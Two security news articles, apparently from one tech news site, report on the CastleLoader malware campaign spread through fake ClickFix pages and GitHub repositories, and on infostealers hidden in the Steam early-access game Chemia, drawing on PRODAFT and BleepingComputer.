CastleLoader Malware Campaign Hits U.S. Government and Developers - 1

Image by Xavier Cee, from Unsplash

CastleLoader Malware Campaign Hits U.S. Government and Developers

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

A new and dangerous malware called CastleLoader is infecting users through fake websites and GitHub repositories.

In a rush? Here are the quick facts:

  • CastleLoader malware infected 469 devices, including U.S. government systems.
  • Malware spreads via fake ClickFix updates and GitHub repos.
  • GitHub deception tricks developers into downloading malicious files.

Since its discovery in early 2025, CastleLoader has infected at least 469 devices across the world, including U.S. government systems, as first reported by cybersecurity firm PRODAFT .

Researchers explain that CastleLoader functions as a malware distribution platform, which spreads RedLine alongside StealC, DeerStealer, NetSupport RAT, and HijackLoader.

The malicious programs enable attackers to steal passwords, cookies, and crypto wallets, while providing them with remote access to victim devices.

Attackers use fake ClickFix phishing sites that mimic legitimate sources, such as Google Meet, browser updates, and document checks. Users who follow fake error correction instructions on the screen end up running malicious PowerShell commands, which initiate the infection sequence without their knowledge.

“Castle Loader is a new and active threat, rapidly adopted by various malicious campaigns to deploy an array of other loaders and stealers,” PRODAFT said, as reported by The Hacker News .

“Its sophisticated anti-analysis techniques and multi-stage infection process highlight its effectiveness as a primary distribution mechanism in the current threat landscape,” the researchers added.

CastleLoader also spreads through fake GitHub repositories that appear to host trusted developer tools. These deceptive pages lead users to install malware, exploiting trust in platforms like GitHub.

The malware also uses fake GitHub repositories, which pretend to host developer tools to spread its infection. Users who visit these deceptive pages end up installing malware because they trust the GitHub platform.

The researchers identify this malware as part of a broader MaaS operation. The C2 control panel provides hackers with real-time capabilities to manage infected systems, execute attacks, and modify their campaigns.

“This technique exploits developers’ trust in GitHub and their tendency to run installation commands from repositories that appear reputable,” PRODAFT noted.

With an infection rate of nearly 29%, experts warn users to avoid unfamiliar update sites and double-check all software sources.

Hackers Use Steam Game To Secretly Steal User Data - 2

Image by Florian Olivio, from Unsplash

Hackers Use Steam Game To Secretly Steal User Data

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

Hackers used a Steam game called Chemia to hide malware that secretly steals player data

In a rush? Here are the quick facts:

  • The game delivered HijackLoader and Vidar infostealers to user devices.
  • Malware connected to a Telegram-based command-and-control system.
  • The attack was stealthy, with no impact on gameplay performance.

The hacking group EncryptHub secretly embedded info-stealing malware into the early access Steam game Chemia, putting unsuspecting players at risk.

BleepingComputer , who first reported this story, explains that Chemia, a survival crafting game by Aether Forge Studios, is still in early access and has no official release date.

According to cybersecurity firm Prodaft, the compromise began on July 22 when EncryptHub added malicious files to the game.

Did you play Chemia on Steam? 🎮 Then you should be worried. LARVA-208’s modification of the game to distribute Fickle Stealer, HijackLoader and Vidar demonstrates a concerning trend. ➡️Check the IOCs now: https://t.co/heavBpufeD #threatintel #cybersecurity #malware #IOC pic.twitter.com/epfckhIohC — PRODAFT (@PRODAFT) July 23, 2025

The first malware, HijackLoader (CVKRUTNP.exe), sets up long-term device access before downloading the Vidar info-stealing program. The malware connects with its command center through a Telegram channel.

The second malware, Fickle Stealer, is added through a DLL file named cclib.dll just three hours after the initial malware deployment. The file executes PowerShell scripts to retrieve its main payload from an untrustworthy domain.

BleepingComputer explains that the Fickle Stealer malware steals browser data, including passwords, cookies and cryptocurrency wallet information.

“The compromised executable appears legitimate to users downloading from Steam, creating an effective social engineering component that relies on platform trust rather than traditional deception techniques,” Prodaft told BleepingComputer.

“When users click on the Playtest of this game, which they find in the free games, they are actually downloading malicious software,” the researchers added.

The malware runs silently, without disrupting gameplay, so most players remain unaware that their data is being stolen. The exact method through which EncryptHub accessed the game remains unknown, but insider involvement seems probable.

The game developers have not made any public announcements about the situation, while the game continues to remain live on Steam.

BleepingComputer notes that this is the third malware case involving early access Steam games this year. Until an official investigation is completed, experts recommend avoiding Chemia and being cautious with early access titles.